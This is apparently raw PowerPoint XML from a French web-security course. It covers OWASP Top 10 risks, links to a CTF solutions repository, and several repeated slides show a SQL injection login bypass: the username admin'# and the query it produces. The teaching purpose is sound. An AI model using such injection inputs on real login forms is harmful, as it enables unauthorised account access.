              <a:t>La première étape est la définition d'un périmètre de sécurité autour du réseau d'entreprise face au réseau Internet.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1085850" lvl="2" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Il faut également définir un périmètre de sécurité autour de chacun de ces réseaux inclus dans le réseau intranet. (rappel de l’exercice LVM)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Cette compartimentation du réseau intranet rend plus difficile une éventuelle pénétration.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="628650"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6</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24936856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7. Les failles XSS se produisent chaque fois qu'une application inclut des données non fiables dans une nouvelle page Web sans validation ou échappement approprié, ou met à jour une page Web existante avec des données fournies par l'utilisateur en utilisant une API de navigateur qui peut créer du HTML ou du JavaScript. XSS permet aux attaquants d'exécuter des scripts dans le navigateur de la victime, ce qui peut détourner les sessions des utilisateurs, défigurer les sites web ou rediriger l'utilisateur vers des sites malveillants.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>8. Une désérialisation non sécurisée conduit souvent à l'exécution de code à distance. Même si les défauts de désérialisation n'entraînent pas l'exécution de code à distance, ils peuvent être utilisés pour réaliser des attaques, notamment des attaques par rejeu, des attaques par injection et des attaques par élévation de privilèges.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>9. Les composants, tels que les bibliothèques, les </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>frameworks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> et autres modules logiciels, s'exécutent avec les mêmes privilèges que l'application. Si un composant vulnérable est exploité, une telle attaque peut faciliter de graves pertes de données ou la prise de contrôle du serveur. Les applications et les API utilisant des composants présentant des vulnérabilités connues peuvent miner les défenses de l'application et permettre diverses attaques et incidences.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>10. Une journalisation et une surveillance insuffisantes, associées à une intégration manquante ou inefficace avec la réponse aux incidents, permettent aux attaquants d'attaquer davantage les systèmes, de maintenir la persistance, de pivoter vers plus de systèmes et d'altérer, extraire ou détruire les données. La plupart des études sur les violations montrent que le temps de détection d'une violation est supérieur à 200 jours, généralement détecté par des parties externes plutôt que par des processus ou une surveillance internes.</a:t>
            </a:r>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67</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22359594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68</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36253442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effectLst/>
                <a:latin typeface="ui-monospace"/>
              </a:rPr>
              <a:t>admin / admin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
                <a:latin typeface="ui-monospace"/>
              </a:rPr>
              <a:t>Code source</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
                <a:latin typeface="ui-monospace"/>
              </a:rPr>
              <a:t>Remove disabled</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:effectLst/>
              <a:latin typeface="ui-monospace"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
                <a:latin typeface="ui-monospace"/>
              </a:rPr>
              <a:t>All</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>https://github.com/zyjsuper/root-me-4/tree/master/Web-Server</a:t>
            </a:r>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69</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29545594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failles d'injection, telles que l'injection SQL, NoSQL, OS et LDAP, se produisent lorsque des données non fiables sont envoyées à un interpréteur dans le cadre d'une commande ou d'une requête. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Les données hostiles de l'attaquant peuvent inciter l'interpréteur à exécuter des commandes non souhaitées ou à accéder à des données sans autorisation appropriée.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="fr-FR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="50596C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>Si une ligne est retournée, c'est que les identifiants sont bons.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="50596C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="50596C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>Il est facile de contourner cette authentification avec une injection SQL simple.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="50596C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="50596C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>Si un utilisateur « admin » existe, il sera possible de mettre dans le champ nom d'utilisateur : « admin'# » et n'importe quoi dans le champ mot de passe.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="50596C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="50596C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>La requête SQL devient donc :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F92672"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>SELECT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> * </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F92672"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>FROM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F92672"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>USERS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F92672"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>WHERE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A6E22E"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>'admin'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="75715E"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>#' AND </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="75715E"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="75715E"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t> = '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="75715E"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>nimportequoi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="75715E"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>' LIMIT 1;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="50596C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>La requête va chercher l'utilisateur admin mais le reste est commenté. Donc l'utilisateur admin est retourné, et l'utilisateur est authentifié.</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70</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33679621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0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="50596C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>Si une ligne est retournée, c'est que les identifiants sont bons.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="50596C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="50596C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>Il est facile de contourner cette authentification avec une injection SQL simple.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="50596C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="50596C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>Si un utilisateur « admin » existe, il sera possible de mettre dans le champ nom d'utilisateur : « admin'# » et n'importe quoi dans le champ mot de passe.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="50596C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="50596C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>La requête SQL devient donc :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F92672"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>SELECT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> * </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F92672"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>FROM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F92672"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>USERS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F92672"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>WHERE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A6E22E"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>'admin'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="75715E"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>#' AND </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="75715E"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="75715E"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t> = '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="75715E"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>nimportequoi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="75715E"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>' LIMIT 1;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="50596C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>La requête va chercher l'utilisateur admin mais le reste est commenté. Donc l'utilisateur admin est retourné, et l'utilisateur est authentifié.</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71</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31850792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0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="50596C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>Si une ligne est retournée, c'est que les identifiants sont bons.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="50596C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="50596C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>Il est facile de contourner cette authentification avec une injection SQL simple.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="50596C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="50596C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>Si un utilisateur « admin » existe, il sera possible de mettre dans le champ nom d'utilisateur : « admin'# » et n'importe quoi dans le champ mot de passe.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="50596C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="50596C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>La requête SQL devient donc :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F92672"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>SELECT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> * </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F92672"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>FROM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F92672"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>USERS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F92672"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>WHERE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A6E22E"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>'admin'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="75715E"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>#' AND </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="75715E"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="75715E"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t> = '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="75715E"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>nimportequoi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="75715E"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>' LIMIT 1;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="50596C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>La requête va chercher l'utilisateur admin mais le reste est commenté. Donc l'utilisateur admin est retourné, et l'utilisateur est authentifié.</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72</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14634068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0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="50596C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>Si une ligne est retournée, c'est que les identifiants sont bons.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="50596C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="50596C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>Il est facile de contourner cette authentification avec une injection SQL simple.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="50596C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="50596C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>Si un utilisateur « admin » existe, il sera possible de mettre dans le champ nom d'utilisateur : « admin'# » et n'importe quoi dans le champ mot de passe.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="50596C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="50596C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>La requête SQL devient donc :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F92672"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>SELECT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> * </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F92672"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>FROM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F92672"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>USERS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F92672"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>WHERE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A6E22E"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>'admin'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="75715E"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>#' AND </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="75715E"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="75715E"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t> = '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="75715E"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>nimportequoi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="75715E"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>' LIMIT 1;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="50596C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>La requête va chercher l'utilisateur admin mais le reste est commenté. Donc l'utilisateur admin est retourné, et l'utilisateur est authentifié.</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73</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10549468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lgn="just">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="173A59"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Les champs d’insertion sont souvent des fonctionnalités touchées par les attaques persistantes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="173A59"/>
                </a:solidFill>
